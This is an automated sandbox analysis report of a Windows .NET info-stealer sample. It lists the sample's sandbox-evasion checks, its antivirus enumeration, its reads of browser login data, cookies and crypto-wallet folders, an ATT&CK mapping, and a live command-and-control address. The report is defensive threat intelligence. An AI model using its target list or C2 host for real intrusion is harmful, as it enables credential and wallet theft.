          Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
          Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: Amcache.hve.4.drBinary or memory string: VMware20,1
          Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
          Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
          Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
          Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
          Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
          Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
          Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
          Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
          Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
          Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
          Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
          Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
          Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
          Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
          Source: file.exe, 00000000.00000003.1794469144.000001D623DAC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1835593981.000001D623DAC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1837048091.000001D623DB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: dump.pcap, type: PCAP
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 7056, type: MEMORYSTR
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 7056, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: dump.pcap, type: PCAP
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 7056, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
          Windows Management Instrumentation
          1
          DLL Side-Loading
          1
          Process Injection
          1
          Masquerading
          1
          OS Credential Dumping
          231
          Security Software Discovery
          Remote Services1
          Archive Collected Data
          1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts2
          Command and Scripting Interpreter
          Boot or Logon Initialization Scripts1
          DLL Side-Loading
          1
          Disable or Modify Tools
          LSASS Memory1
          Process Discovery
          Remote Desktop Protocol2
          Data from Local System
          11
          Non-Standard Port
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)241
          Virtualization/Sandbox Evasion
          Security Account Manager241
          Virtualization/Sandbox Evasion
          SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Process Injection
          NTDS1
          Application Window Discovery
          Distributed Component Object ModelInput Capture2
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading
          LSA Secrets113
          System Information Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          file.exe5%ReversingLabs
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://tempuri.org/Endpoint/CheckConnectResponse0%URL Reputationsafe
          http://schemas.datacontract.org/2004/07/0%URL Reputationsafe
          http://tempuri.org/Endpoint/EnvironmentSettings0%URL Reputationsafe
          http://tempuri.org/Endpoint/CheckConnect0%URL Reputationsafe
          http://tempuri.org/Endpoint/VerifyUpdateResponse0%URL Reputationsafe
          http://tempuri.org/Endpoint/SetEnvironment0%URL Reputationsafe
          http://tempuri.org/Endpoint/SetEnvironmentResponse0%URL Reputationsafe
          http://tempuri.org/Endpoint/GetUpdates0%URL Reputationsafe
          http://tempuri.org/Endpoint/GetUpdatesResponse0%URL Reputationsafe
          http://tempuri.org/Endpoint/EnvironmentSettingsResponse0%URL Reputationsafe
          http://tempuri.org/Endpoint/VerifyUpdate0%URL Reputationsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
          https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous0%Avira URL Cloudsafe
          https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
          https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
          https://api.ip.sb0%Avira URL Cloudsafe
          http://schemas.xmlsoap.org/soap/envelope/0%Avira URL Cloudsafe
          http://tempuri.org/0%Avira URL Cloudsafe
          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
          http://upx.sf.net0%Avira URL Cloudsafe
          https://api.ip.sb/geoip0%Avira URL Cloudsafe
          http://91.92.253.107:13342b0%Avira URL Cloudsafe
          http://91.92.253.107:13340%Avira URL Cloudsafe
          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%Avira URL Cloudsafe
          http://tempuri.org/Endpoint/SetEnv0%Avira URL Cloudsafe
          https://ac.ecosia.org/autocomplete?q=0%Avira URL Cloudsafe
          http://schemas.xmlsoap.org/ws/2004/08/addressing0%Avira URL Cloudsafe
          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%Avira URL Cloudsafe
          http://tempuri.org/0v0%Avira URL Cloudsafe
          https://www.ecosia.org/newtab/0%Avira URL Cloudsafe
          http://schemas.xmlsoap.org/ws/2004/08/addressing/fault0%Avira URL Cloudsafe
          http://91.92.253.107:1334/0%Avira URL Cloudsafe
          http://91.92.253.10%Avira URL Cloudsafe
          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%Avira URL Cloudsafe
          http://schemas.xmlsoap.org/soap/actor/next0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          api.ip.sb
          unknown
          unknowntrue
            unknown
            NameMaliciousAntivirus DetectionReputation
            http://91.92.253.107:1334/true
            • Avira URL Cloud: safe
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.1735599246.000001D61B635000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B6E7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B583000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1736302201.000001D624198000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B68E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B5DC000.00000004.00000800.00020000.00000000.sdmp, tmp1AE8.tmp.0.dr, tmp529A.tmp.0.dr, tmp52AB.tmp.0.dr, tmp5288.tmp.0.dr, tmp5299.tmp.0.dr, tmp5257.tmp.0.dr, tmp89E9.tmp.0.dr, tmp89B9.tmp.0.dr, tmp1B29.tmp.0.dr, tmp1B19.tmp.0.dr, tmp1B08.tmp.0.dr, tmp5268.tmp.0.drfalse
            • Avira URL Cloud: safe
            unknown
            https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.1735599246.000001D61B635000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B6E7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B583000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1736302201.000001D624198000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B68E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B5DC000.00000004.00000800.00020000.00000000.sdmp, tmp1AE8.tmp.0.dr, tmp529A.tmp.0.dr, tmp52AB.tmp.0.dr, tmp5288.tmp.0.dr, tmp5299.tmp.0.dr, tmp5257.tmp.0.dr, tmp89E9.tmp.0.dr, tmp89B9.tmp.0.dr, tmp1B29.tmp.0.dr, tmp1B19.tmp.0.dr, tmp1B08.tmp.0.dr, tmp5268.tmp.0.drfalse
            • Avira URL Cloud: safe
            unknown
            https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.1735599246.000001D61B635000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B6E7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B583000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1736302201.000001D624198000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B68E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B5DC000.00000004.00000800.00020000.00000000.sdmp, tmp1AE8.tmp.0.dr, tmp529A.tmp.0.dr, tmp52AB.tmp.0.dr, tmp5288.tmp.0.dr, tmp5299.tmp.0.dr, tmp5257.tmp.0.dr, tmp89E9.tmp.0.dr, tmp89B9.tmp.0.dr, tmp1B29.tmp.0.dr, tmp1B19.tmp.0.dr, tmp1B08.tmp.0.dr, tmp5268.tmp.0.drfalse
            • Avira URL Cloud: safe
            unknown
            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousfile.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://tempuri.org/Endpoint/CheckConnectResponsefile.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://schemas.datacontract.org/2004/07/file.exe, 00000000.00000002.1956078575.000001D60B499000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://tempuri.org/Endpoint/EnvironmentSettingsfile.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://api.ip.sbfile.exe, 00000000.00000002.1956078575.000001D60B44A000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://api.ip.sb/geoipfile.exe, 00000000.00000002.1956078575.000001D60B44A000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://schemas.xmlsoap.org/soap/envelope/file.exe, 00000000.00000002.1956078575.000001D60B47E000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.1735599246.000001D61B635000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B6E7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B583000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1736302201.000001D624198000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B68E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B5DC000.00000004.00000800.00020000.00000000.sdmp, tmp1AE8.tmp.0.dr, tmp529A.tmp.0.dr, tmp52AB.tmp.0.dr, tmp5288.tmp.0.dr, tmp5299.tmp.0.dr, tmp5257.tmp.0.dr, tmp89E9.tmp.0.dr, tmp89B9.tmp.0.dr, tmp1B29.tmp.0.dr, tmp1B19.tmp.0.dr, tmp1B08.tmp.0.dr, tmp5268.tmp.0.drfalse
            • Avira URL Cloud: safe
            unknown
            http://tempuri.org/file.exe, 00000000.00000002.1956078575.000001D60B47E000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://upx.sf.netAmcache.hve.4.drfalse
            • Avira URL Cloud: safe
            unknown
            http://tempuri.org/Endpoint/CheckConnectfile.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.1735599246.000001D61B635000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B6E7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B583000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1736302201.000001D624198000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B68E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B5DC000.00000004.00000800.00020000.00000000.sdmp, tmp1AE8.tmp.0.dr, tmp529A.tmp.0.dr, tmp52AB.tmp.0.dr, tmp5288.tmp.0.dr, tmp5299.tmp.0.dr, tmp5257.tmp.0.dr, tmp89E9.tmp.0.dr, tmp89B9.tmp.0.dr, tmp1B29.tmp.0.dr, tmp1B19.tmp.0.dr, tmp1B08.tmp.0.dr, tmp5268.tmp.0.drfalse
            • Avira URL Cloud: safe
            unknown
            http://91.92.253.107:1334file.exe, 00000000.00000002.1956078575.000001D60B612000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://91.92.253.107:13342bfile.exe, 00000000.00000002.1956078575.000001D60B612000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://www.ecosia.org/newtab/file.exe, 00000000.00000003.1735599246.000001D61B635000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B6E7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B583000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1736302201.000001D624198000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B68E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B5DC000.00000004.00000800.00020000.00000000.sdmp, tmp1AE8.tmp.0.dr, tmp529A.tmp.0.dr, tmp52AB.tmp.0.dr, tmp5288.tmp.0.dr, tmp5299.tmp.0.dr, tmp5257.tmp.0.dr, tmp89E9.tmp.0.dr, tmp89B9.tmp.0.dr, tmp1B29.tmp.0.dr, tmp1B19.tmp.0.dr, tmp1B08.tmp.0.dr, tmp5268.tmp.0.drfalse
            • Avira URL Cloud: safe
            unknown
            http://tempuri.org/Endpoint/VerifyUpdateResponsefile.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://tempuri.org/Endpoint/SetEnvironmentfile.exe, 00000000.00000002.1956078575.000001D60B620000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://tempuri.org/Endpoint/SetEnvironmentResponsefile.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://tempuri.org/Endpoint/GetUpdatesfile.exe, 00000000.00000002.1956078575.000001D60B612000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1956078575.000001D60B44A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1956078575.000001D60B47E000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.1735599246.000001D61B635000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B6E7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B583000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1736302201.000001D624198000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B68E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B5DC000.00000004.00000800.00020000.00000000.sdmp, tmp1AE8.tmp.0.dr, tmp529A.tmp.0.dr, tmp52AB.tmp.0.dr, tmp5288.tmp.0.dr, tmp5299.tmp.0.dr, tmp5257.tmp.0.dr, tmp89E9.tmp.0.dr, tmp89B9.tmp.0.dr, tmp1B29.tmp.0.dr, tmp1B19.tmp.0.dr, tmp1B08.tmp.0.dr, tmp5268.tmp.0.drfalse
            • Avira URL Cloud: safe
            unknown
            http://schemas.xmlsoap.org/ws/2004/08/addressingfile.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://schemas.xmlsoap.org/ws/2004/08/addressing/faultfile.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://tempuri.org/0vfile.exe, 00000000.00000002.1956078575.000001D60B44A000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://tempuri.org/Endpoint/GetUpdatesResponsefile.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.1735599246.000001D61B635000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B6E7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B583000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1736302201.000001D624198000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B68E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B5DC000.00000004.00000800.00020000.00000000.sdmp, tmp1AE8.tmp.0.dr, tmp529A.tmp.0.dr, tmp52AB.tmp.0.dr, tmp5288.tmp.0.dr, tmp5299.tmp.0.dr, tmp5257.tmp.0.dr, tmp89E9.tmp.0.dr, tmp89B9.tmp.0.dr, tmp1B29.tmp.0.dr, tmp1B19.tmp.0.dr, tmp1B08.tmp.0.dr, tmp5268.tmp.0.drfalse
            • Avira URL Cloud: safe
            unknown
            http://tempuri.org/Endpoint/SetEnvfile.exe, 00000000.00000002.1956078575.000001D60B620000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://tempuri.org/Endpoint/EnvironmentSettingsResponsefile.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://tempuri.org/Endpoint/VerifyUpdatefile.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namefile.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://91.92.253.1file.exe, 00000000.00000002.1956078575.000001D60B620000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.1735599246.000001D61B635000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B6E7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B583000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1736302201.000001D624198000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B68E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B5DC000.00000004.00000800.00020000.00000000.sdmp, tmp1AE8.tmp.0.dr, tmp529A.tmp.0.dr, tmp52AB.tmp.0.dr, tmp5288.tmp.0.dr, tmp5299.tmp.0.dr, tmp5257.tmp.0.dr, tmp89E9.tmp.0.dr, tmp89B9.tmp.0.dr, tmp1B29.tmp.0.dr, tmp1B19.tmp.0.dr, tmp1B08.tmp.0.dr, tmp5268.tmp.0.drfalse
            • Avira URL Cloud: safe
            unknown
            http://schemas.xmlsoap.org/soap/actor/nextfile.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            91.92.253.107
            unknownBulgaria
            34368THEZONEBGtrue
            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1505135
            Start date and time:2024-09-05 20:24:25 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 4m 51s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:9
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:file.exe
            Detection:MAL
            Classification:mal96.troj.spyw.evad.winEXE@2/49@1/1
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:Failed
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 104.26.12.31, 104.26.13.31, 172.67.75.172, 52.168.117.173
            • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, api.ip.sb.cdn.cloudflare.net, ocsp.digicert.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Report size getting too big, too many NtSetInformationFile calls found.
            • VT rate limit hit for: file.exe
            TimeTypeDescription
            14:25:21API Interceptor86x Sleep call for process: file.exe modified
            14:25:43API Interceptor1x Sleep call for process: WerFault.exe modified
            No context
            No context
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            THEZONEBGm68k.nn.elfGet hashmaliciousMiraiBrowse
            • 91.92.246.113
            arm7.nn.elfGet hashmaliciousMiraiBrowse
            • 91.92.246.113
            https://webmail_208425654.itdays.net/271702705cloudstore-428375907?data=consumer-in@kenvue.comGet hashmaliciousHTMLPhisherBrowse
            • 91.92.242.44
            SecuriteInfo.com.Script.SNH-gen.5224.29912.exeGet hashmaliciousFormBookBrowse
            • 91.92.254.145
            1.ps1Get hashmaliciousUnknownBrowse
            • 91.92.244.213
            85.239.34.249-bot.mipsel-2024-08-21T04_13_33.elfGet hashmaliciousMiraiBrowse
